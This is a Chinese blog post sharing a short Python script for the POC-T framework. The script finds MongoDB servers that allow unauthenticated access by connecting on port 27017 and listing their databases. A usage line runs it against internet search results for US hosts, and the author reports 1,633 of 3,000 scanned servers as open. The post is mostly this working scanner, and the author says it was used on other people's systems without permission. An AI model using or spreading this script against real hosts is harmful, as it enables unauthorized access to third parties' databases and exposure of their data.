mongodb未授权访问脚本

最新推荐文章于 2024-04-16 11:34:32 发布
最新推荐文章于 2024-04-16 11:34:32 发布
阅读量7.5k 收藏 1
点赞数
文章标签: 脚本 mongodb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzzjx7/article/details/52503546
版权

有事候知识整合起来会发生很大的威力,尝试着写了一个poc来测试mongodb的未授权访问漏洞,发现危害还是很大的。

把脚本放在https://github.com/Xyntax/POC-T,框架的script目录下面。脚本仅供学习:要安装pymongo 

#!/usr/bin/python
# -*- coding: UTF-8 -*-

"""
moogodb未授权访问

Usage:
  python POC-T.py -s mongodb-unauth -aZ "port:27017 country:us"

"""


import socket
import sys
import pymongo
from plugin.util import host2IP
from plugin.util import checkPortTcp

def poc(url):
	url = host2IP(url)
	ip = url.split(':')[0]
	try:
		if not checkPortTcp(ip,27017):
			return False
		if testConnect(ip,27017):
			return ip
	except Exception,e:
		return False
	return False

def testConnect(ip,port=27017):
	global dbname
	try:
		conn = pymongo.MongoClient(ip,27017,socketTimeoutMS=3000)
		dbname = conn.database_names()
		#print dbname
		if dbname:
			return True
	except Exception,e:
		return False

以关键字搜索,扫了3000个,有1633个存在漏洞。


ZZZJX7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
MongoDB授权漏洞
qq_45434762的博客
05-12 1014
Mongo授权访问漏洞产生原因由于3.0版本以前MongoDB服务启用后监听地址为0.0.0.0,导致无需授权远程访问数据库利用方法mongo x.x.x.x 防御方法1、主机防火墙启用...
【网络安全实战】某配送平台zabbix 授权访问 + 弱口令
A1_3_9_7的博客
01-22 393
找到一个某src的子站,通过信息收集插件wappalyzer,发现ZABBIX-监控系统:使用谷歌搜索历史漏洞:zabbix漏洞通过目录扫描扫描到后台,谷歌搜索一下有没有默认弱口令成功进去了,挖洞就是这么简单:搜索文章还爆过授权访问漏洞,打一波又成功进去了,已经清除缓存在拼接路径的,进去成功寻找功能点,在搜索位置输入任何东西,前端页面就会显示什么,猜测可能存在反射xss,但没什么用,继续测试ssti注入不存在,这个站还可以getshell,但是点到为止。
渗透测试常用方法总结
qq_53058639的博客
03-10 1263
Hadoop=HDFS(文件系统,数据存储技术相关)+ Mapreduce(数据处理),Hadoop的数据来源可以是任何形式,在处理半结构化和非结构化数据上与关系型数据库相比有更好的性能,具有更灵活的处理能力,不管任何数据形式最终会转化为key/value,key/value是基本数据单元。一般组织中很多独立安装的 Esxi 形式的私有云,或独立部署的虚拟化系统。没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。
敏感信息泄露总结
热门推荐
goddemon
03-15 1万+
一.源代码泄露 二.服务器导致的泄露 Apache类泄露 样例文件泄露 /examples/servlets/servlet/CookieExample /examples/servlets/servlet/RequestHeadersExample /examples/jsp/snp/snoop.jsp /examples/async/async1 cookie泄露 IIS泄露 典型iis短文件名 https://github.com/lijiejie/IIS_shortname_Scanner To
授权漏洞批量扫描poc
qq_45300786的博客
08-15 2164
一般来说我们检验是否存在漏洞,都是一个个的检验。但是如果遇到了目标有很多,这个怎么办呢? 这里提供2个思路 一、msf的扫描 找到 1.1、指定文件ip扫描 192.168.100.222 192.168.100.223 192.168.100.224 192.168.100.225 192.168.100.226 这样一行一行写入文本 1.2、指定网络段ip扫描 一般都是扫C段,也就是/24就行了,尽量不要去搞A(8)、B段(16),太多了 二、楼主这里提供一些批量poc import socket
mongodb授权漏洞
weixin_53884648的博客
10-09 6822
mongodb 授权访问漏洞复现及修复方案总结
mongodb授权访问复现
weixin_43152809的博客
07-15 1037
造成授权访问的根本原因就在于启动Mongodb的时候设置--auth也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。出现白线标注的内容说明可以使用mavciat等数据库连接软件直接进行连接。在浏览器进行访问,出现如下页面则说明环境搭建成功。可以使用navciat等进行连接。随后将docker运行起来。搭建mongodb环境。...
大数据修炼之mongodb
u013257767的博客
10-09 362
文章目录概述docker安装使用用户数据库文档数据 概述 官网 MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。 MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的。 https://docs.mongodb.com/manual/ https://www.runoob.com/mongodb/mongodb-databases-documents-collections
Mongodb授权访问漏洞
01-12 830
Mongodb下载:https://www.mongodb.org/dl/win32/i386 1、下载msi 一路Next安装 2、创建数据目录,如:D:\mongodb\data\db 3、运行mongod.exe --dbpath D:\mongodb\data\db 参考链接: https://www.mongodb.org/dl/win32/...
MongoDB 授权访问漏洞
锋刃科技的博客
07-02 1453
前言 MongoDB 是一个基于分布式文件存储的数据库 漏洞分析 Mongodb 在启动的时候提供了很多参数,如日志记录到哪个文件夹,是否开启认证等。造成授权访问的根本原因就在于启动 Mongodb 的时候设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 环境搭建 使用docker来搜索镜像,并拉取排名靠前的 docker search mongodb docker pull mongo
mogodb授权访问扫描脚本
07-16
mogodb授权访问扫描脚本Python。 实例:mogodbscan.py 192.168.1.1/24
mongodb授权漏洞加固.pdf
03-15
mongodb授权漏洞加固
Windows下自动备份MongoDB的批处理脚本
09-10
在部署一个项目的时候,为了保证数据的安全,我们希望对Mongodb数据库做自动定时备份。因为我们使用的操作系统是windows,所以在做这个的时候,就想到了windows的任务计划功能。所以,我们写了如下的批处理脚本,...
Centos7 搭建Mongodb 分片集群4.0/ PSA(三成员副本集)
jiangbenchu的博客
04-12 743
MongoDB是一个分布式非关系型数据库管理系统。
Mongodb入门--头歌实验MongoDB 实验——数据库优化
qq_62377885的博客
04-12 1196
本关任务:完成慢查询设置。
MongoDB【五】索引
最新发布
2301_76508397的博客
04-16 397
MongoDB中,索引对于提升查询性能至关重要,特别是针对大型数据集时。以下是如何在MongoDB中创建、查看和删除索引的基本操作,以及不同类型的索引如何影响查询性能。
Mongodb入门--头歌实验MongoDB 复制集 & 分片
qq_62377885的博客
04-12 984
一、MongoDB一、MongoDB
那个工具可以测试mongodb授权访问
04-23
很抱歉,我无法回答这个问题。测试授权访问是一种非法行为,与道德和法律规定相悖,因此我不能提供任何有关此类工具的信息。作为一名AI语言模型,我的目的是帮助您回答技术上的问题,同时也要确保我的回答不会违反法律和道德准则。感谢您的理解和合作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值